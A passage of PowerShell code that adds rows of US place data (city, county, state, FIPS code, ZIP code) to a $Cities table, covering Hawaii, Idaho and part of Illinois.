$null = $Cities.Rows.Add("Wahiawa","Honolulu","Hawaii","HI","15","96786") + $null = $Cities.Rows.Add("Mililani","Honolulu","Hawaii","HI","15","96789") + $null = $Cities.Rows.Add("Kula","Maui","Hawaii","HI","15","96790") + $null = $Cities.Rows.Add("Waialua","Honolulu","Hawaii","HI","15","96791") + $null = $Cities.Rows.Add("Waianae","Honolulu","Hawaii","HI","15","96792") + $null = $Cities.Rows.Add("Wailuku","Maui","Hawaii","HI","15","96793") + $null = $Cities.Rows.Add("Waimanalo","Honolulu","Hawaii","HI","15","96795") + $null = $Cities.Rows.Add("Waimea","Kauai","Hawaii","HI","15","96796") + $null = $Cities.Rows.Add("Waipahu","Honolulu","Hawaii","HI","15","96797") + $null = $Cities.Rows.Add("Zcta 967hh","Hawaii","Hawaii","HI","15","967HH") + $null = $Cities.Rows.Add("Zcta 967xx","Kauai","Hawaii","HI","15","967XX") + $null = $Cities.Rows.Add("Honolulu","Honolulu","Hawaii","HI","15","96813") + $null = $Cities.Rows.Add("Honolulu","Honolulu","Hawaii","HI","15","96814") + $null = $Cities.Rows.Add("Honolulu","Honolulu","Hawaii","HI","15","96815") + $null = $Cities.Rows.Add("Honolulu","Honolulu","Hawaii","HI","15","96816") + $null = $Cities.Rows.Add("Honolulu","Honolulu","Hawaii","HI","15","96817") + $null = $Cities.Rows.Add("Honolulu","Honolulu","Hawaii","HI","15","96818") + $null = $Cities.Rows.Add("Honolulu","Honolulu","Hawaii","HI","15","96819") + $null = $Cities.Rows.Add("Honolulu","Honolulu","Hawaii","HI","15","96821") + $null = $Cities.Rows.Add("Honolulu","Honolulu","Hawaii","HI","15","96822") + $null = $Cities.Rows.Add("Honolulu","Honolulu","Hawaii","HI","15","96825") + $null = $Cities.Rows.Add("Honolulu","Honolulu","Hawaii","HI","15","96826") + $null = $Cities.Rows.Add("Barbers point na","Honolulu","Hawaii","HI","15","96862") + $null = $Cities.Rows.Add("Kaneohe mcas","Honolulu","Hawaii","HI","15","96863") + $null = $Cities.Rows.Add("Zcta 968hh","Honolulu","Hawaii","HI","15","968HH") + $null = $Cities.Rows.Add("","Caribou","Idaho","ID","16","83120") + $null = $Cities.Rows.Add("","Caribou","Idaho","ID","16","831XX") + $null = $Cities.Rows.Add("Pocatello","Bannock","Idaho","ID","16","83201") + $null = $Cities.Rows.Add("Chubbuck","Bannock","Idaho","ID","16","83202") + $null = $Cities.Rows.Add("Fort hall","Bingham","Idaho","ID","16","83203") + $null = $Cities.Rows.Add("Pocatello","Bannock","Idaho","ID","16","83204") + $null = $Cities.Rows.Add("Sterling","Bingham","Idaho","ID","16","83210") + $null = $Cities.Rows.Add("American falls","Power","Idaho","ID","16","83211") + $null = $Cities.Rows.Add("Arbon","Power","Idaho","ID","16","83212") + $null = $Cities.Rows.Add("Arco","Butte","Idaho","ID","16","83213") + $null = $Cities.Rows.Add("Arimo","Bannock","Idaho","ID","16","83214") + $null = $Cities.Rows.Add("Atomic city","Bingham","Idaho","ID","16","83215") + $null = $Cities.Rows.Add("Bancroft","Caribou","Idaho","ID","16","83217") + $null = $Cities.Rows.Add("Basalt","Bingham","Idaho","ID","16","83218") + $null = $Cities.Rows.Add("Bern","Bear Lake","Idaho","ID","16","83220") + $null = $Cities.Rows.Add("Blackfoot","Bingham","Idaho","ID","16","83221") + $null = $Cities.Rows.Add("Bloomington","Bear Lake","Idaho","ID","16","83223") + $null = $Cities.Rows.Add("Challis","Custer","Idaho","ID","16","83226") + $null = $Cities.Rows.Add("Clayton","Custer","Idaho","ID","16","83227") + $null = $Cities.Rows.Add("Clifton","Franklin","Idaho","ID","16","83228") + $null = $Cities.Rows.Add("Dayton","Franklin","Idaho","ID","16","83232") + $null = $Cities.Rows.Add("Downey","Bannock","Idaho","ID","16","83234") + $null = $Cities.Rows.Add("Ellis","Custer","Idaho","ID","16","83235") + $null = $Cities.Rows.Add("Firth","Bingham","Idaho","ID","16","83236") + $null = $Cities.Rows.Add("Franklin","Franklin","Idaho","ID","16","83237") + $null = $Cities.Rows.Add("Geneva","Bear Lake","Idaho","ID","16","83238") + $null = $Cities.Rows.Add("Georgetown","Bear Lake","Idaho","ID","16","83239") + $null = $Cities.Rows.Add("Grace","Caribou","Idaho","ID","16","83241") + $null = $Cities.Rows.Add("Holbrook","Oneida","Idaho","ID","16","83243") + $null = $Cities.Rows.Add("Howe","Butte","Idaho","ID","16","83244") + $null = $Cities.Rows.Add("Inkom","Bannock","Idaho","ID","16","83245") + $null = $Cities.Rows.Add("Lava hot springs","Bannock","Idaho","ID","16","83246") + $null = $Cities.Rows.Add("Mc cammon","Bannock","Idaho","ID","16","83250") + $null = $Cities.Rows.Add("Mackay","Custer","Idaho","ID","16","83251") + $null = $Cities.Rows.Add("Malad city","Oneida","Idaho","ID","16","83252") + $null = $Cities.Rows.Add("Patterson","Lemhi","Idaho","ID","16","83253") + $null = $Cities.Rows.Add("Montpelier","Bear Lake","Idaho","ID","16","83254") + $null = $Cities.Rows.Add("Moore","Butte","Idaho","ID","16","83255") + $null = $Cities.Rows.Add("Paris","Bear Lake","Idaho","ID","16","83261") + $null = $Cities.Rows.Add("Pingree","Bingham","Idaho","ID","16","83262") + $null = $Cities.Rows.Add("Preston","Franklin","Idaho","ID","16","83263") + $null = $Cities.Rows.Add("Rockland","Power","Idaho","ID","16","83271") + $null = $Cities.Rows.Add("Saint charles","Bear Lake","Idaho","ID","16","83272") + $null = $Cities.Rows.Add("Shelley","Bingham","Idaho","ID","16","83274") + $null = $Cities.Rows.Add("Soda springs","Caribou","Idaho","ID","16","83276") + $null = $Cities.Rows.Add("Springfield","Bingham","Idaho","ID","16","83277") + $null = $Cities.Rows.Add("Stanley","Custer","Idaho","ID","16","83278") + $null = $Cities.Rows.Add("Swanlake","Bannock","Idaho","ID","16","83281") + $null = $Cities.Rows.Add("Thatcher","Franklin","Idaho","ID","16","83283") + $null = $Cities.Rows.Add("Wayan","Caribou","Idaho","ID","16","83285") + $null = $Cities.Rows.Add("Weston","Franklin","Idaho","ID","16","83286") + $null = $Cities.Rows.Add("Fish haven","Bear Lake","Idaho","ID","16","83287") + $null = $Cities.Rows.Add("Zcta 832hh","Bannock","Idaho","ID","16","832HH") + $null = $Cities.Rows.Add("Zcta 832xx","Bingham","Idaho","ID","16","832XX") + $null = $Cities.Rows.Add("Twin falls","Twin Falls","Idaho","ID","16","83301") + $null = $Cities.Rows.Add("Rogerson","Twin Falls","Idaho","ID","16","83302") + $null = $Cities.Rows.Add("Albion","Cassia","Idaho","ID","16","83311") + $null = $Cities.Rows.Add("Almo","Cassia","Idaho","ID","16","83312") + $null = $Cities.Rows.Add("Bellevue","Blaine","Idaho","ID","16","83313") + $null = $Cities.Rows.Add("Bliss","Gooding","Idaho","ID","16","83314") + $null = $Cities.Rows.Add("Buhl","Twin Falls","Idaho","ID","16","83316") + $null = $Cities.Rows.Add("Burley","Cassia","Idaho","ID","16","83318") + $null = $Cities.Rows.Add("Carey","Blaine","Idaho","ID","16","83320") + $null = $Cities.Rows.Add("Castleford","Twin Falls","Idaho","ID","16","83321") + $null = $Cities.Rows.Add("Corral","Camas","Idaho","ID","16","83322") + $null = $Cities.Rows.Add("Declo","Cassia","Idaho","ID","16","83323") + $null = $Cities.Rows.Add("Dietrich","Lincoln","Idaho","ID","16","83324") + $null = $Cities.Rows.Add("Eden","Jerome","Idaho","ID","16","83325") + $null = $Cities.Rows.Add("Fairfield","Camas","Idaho","ID","16","83327") + $null = $Cities.Rows.Add("Filer","Twin Falls","Idaho","ID","16","83328") + $null = $Cities.Rows.Add("Gooding","Gooding","Idaho","ID","16","83330") + $null = $Cities.Rows.Add("Hagerman","Gooding","Idaho","ID","16","83332") + $null = $Cities.Rows.Add("Hailey","Blaine","Idaho","ID","16","83333") + $null = $Cities.Rows.Add("Hansen","Twin Falls","Idaho","ID","16","83334") + $null = $Cities.Rows.Add("Hazelton","Jerome","Idaho","ID","16","83335") + $null = $Cities.Rows.Add("Heyburn","Minidoka","Idaho","ID","16","83336") + $null = $Cities.Rows.Add("Hill city","Camas","Idaho","ID","16","83337") + $null = $Cities.Rows.Add("Jerome","Jerome","Idaho","ID","16","83338") + $null = $Cities.Rows.Add("Obsidian","Blaine","Idaho","ID","16","83340") + $null = $Cities.Rows.Add("Kimberly","Twin Falls","Idaho","ID","16","83341") + $null = $Cities.Rows.Add("Naf","Cassia","Idaho","ID","16","83342") + $null = $Cities.Rows.Add("Murtaugh","Twin Falls","Idaho","ID","16","83344") + $null = $Cities.Rows.Add("Oakley","Cassia","Idaho","ID","16","83346") + $null = $Cities.Rows.Add("Paul","Minidoka","Idaho","ID","16","83347") + $null = $Cities.Rows.Add("Picabo","Blaine","Idaho","ID","16","83348") + $null = $Cities.Rows.Add("Richfield","Lincoln","Idaho","ID","16","83349") + $null = $Cities.Rows.Add("Acequia","Minidoka","Idaho","ID","16","83350") + $null = $Cities.Rows.Add("Shoshone","Lincoln","Idaho","ID","16","83352") + $null = $Cities.Rows.Add("Sun valley","Blaine","Idaho","ID","16","83353") + $null = $Cities.Rows.Add("Elk horn","Blaine","Idaho","ID","16","83354") + $null = $Cities.Rows.Add("Wendell","Gooding","Idaho","ID","16","83355") + $null = $Cities.Rows.Add("Zcta 833hh","Blaine","Idaho","ID","16","833HH") + $null = $Cities.Rows.Add("Zcta 833xx","Cassia","Idaho","ID","16","833XX") + $null = $Cities.Rows.Add("Ammon","Bonneville","Idaho","ID","16","83401") + $null = $Cities.Rows.Add("Idaho falls","Bonneville","Idaho","ID","16","83402") + $null = $Cities.Rows.Add("Idaho falls","Bonneville","Idaho","ID","16","83404") + $null = $Cities.Rows.Add("Idaho falls","Bonneville","Idaho","ID","16","83406") + $null = $Cities.Rows.Add("Ashton","Fremont","Idaho","ID","16","83420") + $null = $Cities.Rows.Add("Chester","Fremont","Idaho","ID","16","83421") + $null = $Cities.Rows.Add("Driggs","Teton","Idaho","ID","16","83422") + $null = $Cities.Rows.Add("Dubois","Clark","Idaho","ID","16","83423") + $null = $Cities.Rows.Add("Felt","Teton","Idaho","ID","16","83424") + $null = $Cities.Rows.Add("Hamer","Jefferson","Idaho","ID","16","83425") + $null = $Cities.Rows.Add("Iona","Bonneville","Idaho","ID","16","83427") + $null = $Cities.Rows.Add("Irwin","Bonneville","Idaho","ID","16","83428") + $null = $Cities.Rows.Add("Island park","Fremont","Idaho","ID","16","83429") + $null = $Cities.Rows.Add("Lewisville","Jefferson","Idaho","ID","16","83431") + $null = $Cities.Rows.Add("Macks inn","Fremont","Idaho","ID","16","83433") + $null = $Cities.Rows.Add("Menan","Jefferson","Idaho","ID","16","83434") + $null = $Cities.Rows.Add("Monteview","Jefferson","Idaho","ID","16","83435") + $null = $Cities.Rows.Add("Newdale","Fremont","Idaho","ID","16","83436") + $null = $Cities.Rows.Add("Rexburg","Madison","Idaho","ID","16","83440") + $null = $Cities.Rows.Add("Rigby","Jefferson","Idaho","ID","16","83442") + $null = $Cities.Rows.Add("Ririe","Bonneville","Idaho","ID","16","83443") + $null = $Cities.Rows.Add("Roberts","Jefferson","Idaho","ID","16","83444") + $null = $Cities.Rows.Add("Saint anthony","Fremont","Idaho","ID","16","83445") + $null = $Cities.Rows.Add("Spencer","Clark","Idaho","ID","16","83446") + $null = $Cities.Rows.Add("Sugar city","Madison","Idaho","ID","16","83448") + $null = $Cities.Rows.Add("Swan valley","Bonneville","Idaho","ID","16","83449") + $null = $Cities.Rows.Add("Terreton","Jefferson","Idaho","ID","16","83450") + $null = $Cities.Rows.Add("Teton","Fremont","Idaho","ID","16","83451") + $null = $Cities.Rows.Add("Tetonia","Teton","Idaho","ID","16","83452") + $null = $Cities.Rows.Add("Victor","Teton","Idaho","ID","16","83455") + $null = $Cities.Rows.Add("Carmen","Lemhi","Idaho","ID","16","83462") + $null = $Cities.Rows.Add("Gibbonsville","Lemhi","Idaho","ID","16","83463") + $null = $Cities.Rows.Add("Leadore","Lemhi","Idaho","ID","16","83464") + $null = $Cities.Rows.Add("Lemhi","Lemhi","Idaho","ID","16","83465") + $null = $Cities.Rows.Add("North fork","Lemhi","Idaho","ID","16","83466") + $null = $Cities.Rows.Add("Salmon","Lemhi","Idaho","ID","16","83467") + $null = $Cities.Rows.Add("Tendoy","Lemhi","Idaho","ID","16","83468") + $null = $Cities.Rows.Add("Shoup","Lemhi","Idaho","ID","16","83469") + $null = $Cities.Rows.Add("Zcta 834hh","Bonneville","Idaho","ID","16","834HH") + $null = $Cities.Rows.Add("Zcta 834xx","Clark","Idaho","ID","16","834XX") + $null = $Cities.Rows.Add("South gate plaza","Nez Perce","Idaho","ID","16","83501") + $null = $Cities.Rows.Add("Ahsahka","Clearwater","Idaho","ID","16","83520") + $null = $Cities.Rows.Add("Cottonwood","Idaho","Idaho","ID","16","83522") + $null = $Cities.Rows.Add("Craigmont","Lewis","Idaho","ID","16","83523") + $null = $Cities.Rows.Add("Culdesac","Nez Perce","Idaho","ID","16","83524") + $null = $Cities.Rows.Add("Dixie","Idaho","Idaho","ID","16","83525") + $null = $Cities.Rows.Add("Ferdinand","Idaho","Idaho","ID","16","83526") + $null = $Cities.Rows.Add("Grangeville","Idaho","Idaho","ID","16","83530") + $null = $Cities.Rows.Add("Greencreek","Idaho","Idaho","ID","16","83533") + $null = $Cities.Rows.Add("Juliaetta","Latah","Idaho","ID","16","83535") + $null = $Cities.Rows.Add("Kamiah","Idaho","Idaho","ID","16","83536") + $null = $Cities.Rows.Add("Kendrick","Latah","Idaho","ID","16","83537") + $null = $Cities.Rows.Add("Clearwater","Idaho","Idaho","ID","16","83539") + $null = $Cities.Rows.Add("Lapwai","Nez Perce","Idaho","ID","16","83540") + $null = $Cities.Rows.Add("Lenore","Clearwater","Idaho","ID","16","83541") + $null = $Cities.Rows.Add("Lucile","Idaho","Idaho","ID","16","83542") + $null = $Cities.Rows.Add("Nezperce","Lewis","Idaho","ID","16","83543") + $null = $Cities.Rows.Add("Orofino","Clearwater","Idaho","ID","16","83544") + $null = $Cities.Rows.Add("Peck","Nez Perce","Idaho","ID","16","83545") + $null = $Cities.Rows.Add("Pierce","Clearwater","Idaho","ID","16","83546") + $null = $Cities.Rows.Add("Pollock","Idaho","Idaho","ID","16","83547") + $null = $Cities.Rows.Add("Reubens","Lewis","Idaho","ID","16","83548") + $null = $Cities.Rows.Add("Riggins","Idaho","Idaho","ID","16","83549") + $null = $Cities.Rows.Add("Stites","Idaho","Idaho","ID","16","83552") + $null = $Cities.Rows.Add("Weippe","Clearwater","Idaho","ID","16","83553") + $null = $Cities.Rows.Add("White bird","Idaho","Idaho","ID","16","83554") + $null = $Cities.Rows.Add("Winchester","Lewis","Idaho","ID","16","83555") + $null = $Cities.Rows.Add("Zcta 835hh","Clearwater","Idaho","ID","16","835HH") + $null = $Cities.Rows.Add("Zcta 835xx","Idaho","Idaho","ID","16","835XX") + $null = $Cities.Rows.Add("Atlanta","Elmore","Idaho","ID","16","83601") + $null = $Cities.Rows.Add("Banks","Boise","Idaho","ID","16","83602") + $null = $Cities.Rows.Add("Grasmere","Owyhee","Idaho","ID","16","83604") + $null = $Cities.Rows.Add("Caldwell","Canyon","Idaho","ID","16","83605") + $null = $Cities.Rows.Add("Zcta 83607","Canyon","Idaho","ID","16","83607") + $null = $Cities.Rows.Add("Cambridge","Washington","Idaho","ID","16","83610") + $null = $Cities.Rows.Add("West mountain","Valley","Idaho","ID","16","83611") + $null = $Cities.Rows.Add("Council","Adams","Idaho","ID","16","83612") + $null = $Cities.Rows.Add("Donnelly","Valley","Idaho","ID","16","83615") + $null = $Cities.Rows.Add("Eagle","Ada","Idaho","ID","16","83616") + $null = $Cities.Rows.Add("Montour","Gem","Idaho","ID","16","83617") + $null = $Cities.Rows.Add("Fruitland","Payette","Idaho","ID","16","83619") + $null = $Cities.Rows.Add("Fruitvale","Adams","Idaho","ID","16","83620") + $null = $Cities.Rows.Add("Garden valley","Boise","Idaho","ID","16","83622") + $null = $Cities.Rows.Add("Glenns ferry","Elmore","Idaho","ID","16","83623") + $null = $Cities.Rows.Add("Grand view","Owyhee","Idaho","ID","16","83624") + $null = $Cities.Rows.Add("Greenleaf","Canyon","Idaho","ID","16","83626") + $null = $Cities.Rows.Add("Hammett","Elmore","Idaho","ID","16","83627") + $null = $Cities.Rows.Add("Homedale","Owyhee","Idaho","ID","16","83628") + $null = $Cities.Rows.Add("Horseshoe bend","Boise","Idaho","ID","16","83629") + $null = $Cities.Rows.Add("Idaho city","Boise","Idaho","ID","16","83631") + $null = $Cities.Rows.Add("Indian valley","Adams","Idaho","ID","16","83632") + $null = $Cities.Rows.Add("King hill","Elmore","Idaho","ID","16","83633") + $null = $Cities.Rows.Add("Kuna","Ada","Idaho","ID","16","83634") + $null = $Cities.Rows.Add("Lowman","Boise","Idaho","ID","16","83637") + $null = $Cities.Rows.Add("Mc call","Valley","Idaho","ID","16","83638") + $null = $Cities.Rows.Add("Marsing","Owyhee","Idaho","ID","16","83639") + $null = $Cities.Rows.Add("Melba","Canyon","Idaho","ID","16","83641") + $null = $Cities.Rows.Add("Meridian","Ada","Idaho","ID","16","83642") + $null = $Cities.Rows.Add("Mesa","Adams","Idaho","ID","16","83643") + $null = $Cities.Rows.Add("Middleton","Canyon","Idaho","ID","16","83644") + $null = $Cities.Rows.Add("Midvale","Washington","Idaho","ID","16","83645") + $null = $Cities.Rows.Add("Mountain home","Elmore","Idaho","ID","16","83647") + $null = $Cities.Rows.Add("Mountain home a","Elmore","Idaho","ID","16","83648") + $null = $Cities.Rows.Add("Oreana","Owyhee","Idaho","ID","16","83650") + $null = $Cities.Rows.Add("Nampa","Canyon","Idaho","ID","16","83651") + $null = $Cities.Rows.Add("New meadows","Adams","Idaho","ID","16","83654") + $null = $Cities.Rows.Add("New plymouth","Payette","Idaho","ID","16","83655") + $null = $Cities.Rows.Add("Notus","Canyon","Idaho","ID","16","83656") + $null = $Cities.Rows.Add("Ola","Gem","Idaho","ID","16","83657") + $null = $Cities.Rows.Add("Parma","Canyon","Idaho","ID","16","83660") + $null = $Cities.Rows.Add("Payette","Payette","Idaho","ID","16","83661") + $null = $Cities.Rows.Add("Placerville","Boise","Idaho","ID","16","83666") + $null = $Cities.Rows.Add("Star","Ada","Idaho","ID","16","83669") + $null = $Cities.Rows.Add("Sweet","Gem","Idaho","ID","16","83670") + $null = $Cities.Rows.Add("Warren","Idaho","Idaho","ID","16","83671") + $null = $Cities.Rows.Add("Weiser","Washington","Idaho","ID","16","83672") + $null = $Cities.Rows.Add("Wilder","Canyon","Idaho","ID","16","83676") + $null = $Cities.Rows.Add("Yellow pine","Valley","Idaho","ID","16","83677") + $null = $Cities.Rows.Add("Nampa","Canyon","Idaho","ID","16","83686") + $null = $Cities.Rows.Add("Nampa","Canyon","Idaho","ID","16","83687") + $null = $Cities.Rows.Add("Zcta 836hh","Ada","Idaho","ID","16","836HH") + $null = $Cities.Rows.Add("Zcta 836xx","Owyhee","Idaho","ID","16","836XX") + $null = $Cities.Rows.Add("Boise","Ada","Idaho","ID","16","83702") + $null = $Cities.Rows.Add("Boise","Ada","Idaho","ID","16","83703") + $null = $Cities.Rows.Add("Boise","Ada","Idaho","ID","16","83704") + $null = $Cities.Rows.Add("Boise","Ada","Idaho","ID","16","83705") + $null = $Cities.Rows.Add("Boise","Ada","Idaho","ID","16","83706") + $null = $Cities.Rows.Add("Boise","Ada","Idaho","ID","16","83709") + $null = $Cities.Rows.Add("Boise","Ada","Idaho","ID","16","83712") + $null = $Cities.Rows.Add("Zcta 83713","Ada","Idaho","ID","16","83713") + $null = $Cities.Rows.Add("Garden city","Ada","Idaho","ID","16","83714") + $null = $Cities.Rows.Add("Boise","Ada","Idaho","ID","16","83716") + $null = $Cities.Rows.Add("Boise","Ada","Idaho","ID","16","83788") + $null = $Cities.Rows.Add("Zcta 837hh","Ada","Idaho","ID","16","837HH") + $null = $Cities.Rows.Add("Zcta 837xx","Ada","Idaho","ID","16","837XX") + $null = $Cities.Rows.Add("Athol","Kootenai","Idaho","ID","16","83801") + $null = $Cities.Rows.Add("Avery","Shoshone","Idaho","ID","16","83802") + $null = $Cities.Rows.Add("Bayview","Kootenai","Idaho","ID","16","83803") + $null = $Cities.Rows.Add("Blanchard","Bonner","Idaho","ID","16","83804") + $null = $Cities.Rows.Add("Bonners ferry","Boundary","Idaho","ID","16","83805") + $null = $Cities.Rows.Add("Bovill","Latah","Idaho","ID","16","83806") + $null = $Cities.Rows.Add("Calder","Shoshone","Idaho","ID","16","83808") + $null = $Cities.Rows.Add("Careywood","Bonner","Idaho","ID","16","83809") + $null = $Cities.Rows.Add("Cataldo","Kootenai","Idaho","ID","16","83810") + $null = $Cities.Rows.Add("Clark fork","Bonner","Idaho","ID","16","83811") + $null = $Cities.Rows.Add("Clarkia","Shoshone","Idaho","ID","16","83812") + $null = $Cities.Rows.Add("Cocolalla","Bonner","Idaho","ID","16","83813") + $null = $Cities.Rows.Add("Coeur d alene","Kootenai","Idaho","ID","16","83814") + $null = $Cities.Rows.Add("Coeur d alene","Kootenai","Idaho","ID","16","83815") + $null = $Cities.Rows.Add("Coolin","Bonner","Idaho","ID","16","83821") + $null = $Cities.Rows.Add("Old town","Bonner","Idaho","ID","16","83822") + $null = $Cities.Rows.Add("Deary","Latah","Idaho","ID","16","83823") + $null = $Cities.Rows.Add("Desmet","Benewah","Idaho","ID","16","83824") + $null = $Cities.Rows.Add("Eastport","Boundary","Idaho","ID","16","83826") + $null = $Cities.Rows.Add("Elk river","Clearwater","Idaho","ID","16","83827") + $null = $Cities.Rows.Add("Fernwood","Benewah","Idaho","ID","16","83830") + $null = $Cities.Rows.Add("Genesee","Latah","Idaho","ID","16","83832") + $null = $Cities.Rows.Add("Harrison","Kootenai","Idaho","ID","16","83833") + $null = $Cities.Rows.Add("Harvard","Latah","Idaho","ID","16","83834") + $null = $Cities.Rows.Add("Hayden lake","Kootenai","Idaho","ID","16","83835") + $null = $Cities.Rows.Add("Hope","Bonner","Idaho","ID","16","83836") + $null = $Cities.Rows.Add("Kellogg","Shoshone","Idaho","ID","16","83837") + $null = $Cities.Rows.Add("Kingston","Shoshone","Idaho","ID","16","83839") + $null = $Cities.Rows.Add("Laclede","Bonner","Idaho","ID","16","83841") + $null = $Cities.Rows.Add("Medimont","Kootenai","Idaho","ID","16","83842") + $null = $Cities.Rows.Add("Moscow","Latah","Idaho","ID","16","83843") + $null = $Cities.Rows.Add("Moyie springs","Boundary","Idaho","ID","16","83845") + $null = $Cities.Rows.Add("Mullan","Shoshone","Idaho","ID","16","83846") + $null = $Cities.Rows.Add("Naples","Boundary","Idaho","ID","16","83847") + $null = $Cities.Rows.Add("Nordman","Bonner","Idaho","ID","16","83848") + $null = $Cities.Rows.Add("Osburn","Shoshone","Idaho","ID","16","83849") + $null = $Cities.Rows.Add("Pinehurst","Shoshone","Idaho","ID","16","83850") + $null = $Cities.Rows.Add("Plummer","Benewah","Idaho","ID","16","83851") + $null = $Cities.Rows.Add("Ponderay","Bonner","Idaho","ID","16","83852") + $null = $Cities.Rows.Add("Porthill","Boundary","Idaho","ID","16","83853") + $null = $Cities.Rows.Add("Post falls","Kootenai","Idaho","ID","16","83854") + $null = $Cities.Rows.Add("Potlatch","Latah","Idaho","ID","16","83855") + $null = $Cities.Rows.Add("Priest river","Bonner","Idaho","ID","16","83856") + $null = $Cities.Rows.Add("Princeton","Latah","Idaho","ID","16","83857") + $null = $Cities.Rows.Add("Rathdrum","Kootenai","Idaho","ID","16","83858") + $null = $Cities.Rows.Add("Sagle","Bonner","Idaho","ID","16","83860") + $null = $Cities.Rows.Add("Saint maries","Benewah","Idaho","ID","16","83861") + $null = $Cities.Rows.Add("Sandpoint","Bonner","Idaho","ID","16","83864") + $null = $Cities.Rows.Add("Santa","Benewah","Idaho","ID","16","83866") + $null = $Cities.Rows.Add("Silverton","Shoshone","Idaho","ID","16","83867") + $null = $Cities.Rows.Add("Smelterville","Shoshone","Idaho","ID","16","83868") + $null = $Cities.Rows.Add("Spirit lake","Kootenai","Idaho","ID","16","83869") + $null = $Cities.Rows.Add("Tensed","Benewah","Idaho","ID","16","83870") + $null = $Cities.Rows.Add("Troy","Latah","Idaho","ID","16","83871") + $null = $Cities.Rows.Add("Viola","Latah","Idaho","ID","16","83872") + $null = $Cities.Rows.Add("Wallace","Shoshone","Idaho","ID","16","83873") + $null = $Cities.Rows.Add("Murray","Shoshone","Idaho","ID","16","83874") + $null = $Cities.Rows.Add("Worley","Kootenai","Idaho","ID","16","83876") + $null = $Cities.Rows.Add("Zcta 838hh","Benewah","Idaho","ID","16","838HH") + $null = $Cities.Rows.Add("Zcta 838xx","Kootenai","Idaho","ID","16","838XX") + $null = $Cities.Rows.Add("","Owyhee","Idaho","ID","16","97910") + $null = $Cities.Rows.Add("","Payette","Idaho","ID","16","97913") + $null = $Cities.Rows.Add("","Payette","Idaho","ID","16","979HH") + $null = $Cities.Rows.Add("","Latah","Idaho","ID","16","99128") + $null = $Cities.Rows.Add("","Rock Island","Illinois","IL","17","52761") + $null = $Cities.Rows.Add("Antioch","Lake","Illinois","IL","17","60002") + $null = $Cities.Rows.Add("Arlington height","Cook","Illinois","IL","17","60004") + $null = $Cities.Rows.Add("Arlington height","Cook","Illinois","IL","17","60005") + $null = $Cities.Rows.Add("Elk grove villag","Cook","Illinois","IL","17","60007") + $null = $Cities.Rows.Add("Rolling meadows","Cook","Illinois","IL","17","60008") + $null = $Cities.Rows.Add("Barrington","Lake","Illinois","IL","17","60010") + $null = $Cities.Rows.Add("Crystal lake","McHenry","Illinois","IL","17","60012") + $null = $Cities.Rows.Add("Cary","McHenry","Illinois","IL","17","60013") + $null = $Cities.Rows.Add("Crystal lake","McHenry","Illinois","IL","17","60014") + $null = $Cities.Rows.Add("Deerfield","Lake","Illinois","IL","17","60015") + $null = $Cities.Rows.Add("Des plaines","Cook","Illinois","IL","17","60016") + $null = $Cities.Rows.Add("Rosemont","Cook","Illinois","IL","17","60018") + $null = $Cities.Rows.Add("Fox lake","Lake","Illinois","IL","17","60020") + $null = $Cities.Rows.Add("Fox river grove","McHenry","Illinois","IL","17","60021") + $null = $Cities.Rows.Add("Glencoe","Cook","Illinois","IL","17","60022") + $null = $Cities.Rows.Add("Glenview","Cook","Illinois","IL","17","60025") + $null = $Cities.Rows.Add("Golf","Cook","Illinois","IL","17","60029") + $null = $Cities.Rows.Add("Gages lake","Lake","Illinois","IL","17","60030") + $null = $Cities.Rows.Add("Gurnee","Lake","Illinois","IL","17","60031") + $null = $Cities.Rows.Add("Harvard","McHenry","Illinois","IL","17","60033") + $null = $Cities.Rows.Add("Hebron","McHenry","Illinois","IL","17","60034") + $null = $Cities.Rows.Add("Highland park","Lake","Illinois","IL","17","60035") + $null = $Cities.Rows.Add("Fort sheridan","Lake","Illinois","IL","17","60037") + $null = $Cities.Rows.Add("Highwood","Lake","Illinois","IL","17","60040") + $null = $Cities.Rows.Add("Ingleside","Lake","Illinois","IL","17","60041") + $null = $Cities.Rows.Add("Island lake","McHenry","Illinois","IL","17","60042") + $null = $Cities.Rows.Add("Kenilworth","Cook","Illinois","IL","17","60043") + $null = $Cities.Rows.Add("Lake bluff","Lake","Illinois","IL","17","60044") + $null = $Cities.Rows.Add("Lake forest","Lake","Illinois","IL","17","60045") + $null = $Cities.Rows.Add("Lindenhurst","Lake","Illinois","IL","17","60046") + $null = $Cities.Rows.Add("Long grove","Lake","Illinois","IL","17","60047") + $null = $Cities.Rows.Add("Libertyville","Lake","Illinois","IL","17","60048") + $null = $Cities.Rows.Add("Mc henry","McHenry","Illinois","IL","17","60050") + $null = $Cities.Rows.Add("Morton grove","Cook","Illinois","IL","17","60053") + $null = $Cities.Rows.Add("Mount prospect","Cook","Illinois","IL","17","60056") + $null = $Cities.Rows.Add("Mundelein","Lake","Illinois","IL","17","60060") + $null = $Cities.Rows.Add("Vernon hills","Lake","Illinois","IL","17","60061") + $null = $Cities.Rows.Add("Northbrook","Cook","Illinois","IL","17","60062") + $null = $Cities.Rows.Add("Abbott park","Lake","Illinois","IL","17","60064") + $null = $Cities.Rows.Add("Palatine","Cook","Illinois","IL","17","60067") + $null = $Cities.Rows.Add("Park ridge","Cook","Illinois","IL","17","60068") + $null = $Cities.Rows.Add("Prairie view","Lake","Illinois","IL","17","60069") + $null = $Cities.Rows.Add("Prospect heights","Cook","Illinois","IL","17","60070") + $null = $Cities.Rows.Add("Richmond","McHenry","Illinois","IL","17","60071") + $null = $Cities.Rows.Add("Ringwood","McHenry","Illinois","IL","17","60072") + $null = $Cities.Rows.Add("Round lake","Lake","Illinois","IL","17","60073") + $null = $Cities.Rows.Add("Palatine","Cook","Illinois","IL","17","60074") + $null = $Cities.Rows.Add("Skokie","Cook","Illinois","IL","17","60076") + $null = $Cities.Rows.Add("Skokie","Cook","Illinois","IL","17","60077") + $null = $Cities.Rows.Add("Spring grove","McHenry","Illinois","IL","17","60081") + $null = $Cities.Rows.Add("Wadsworth","Lake","Illinois","IL","17","60083") + $null = $Cities.Rows.Add("Wauconda","Lake","Illinois","IL","17","60084") + $null = $Cities.Rows.Add("Mc gaw park","Lake","Illinois","IL","17","60085") + $null = $Cities.Rows.Add("Waukegan","Lake","Illinois","IL","17","60087") + $null = $Cities.Rows.Add("Great lakes","Lake","Illinois","IL","17","60088") + $null = $Cities.Rows.Add("Buffalo grove","Lake","Illinois","IL","17","60089") + $null = $Cities.Rows.Add("Wheeling","Cook","Illinois","IL","17","60090") + $null = $Cities.Rows.Add("Wilmette","Cook","Illinois","IL","17","60091") + $null = $Cities.Rows.Add("Northfield","Cook","Illinois","IL","17","60093") + $null = $Cities.Rows.Add("Winthrop harbor","Lake","Illinois","IL","17","60096") + $null = 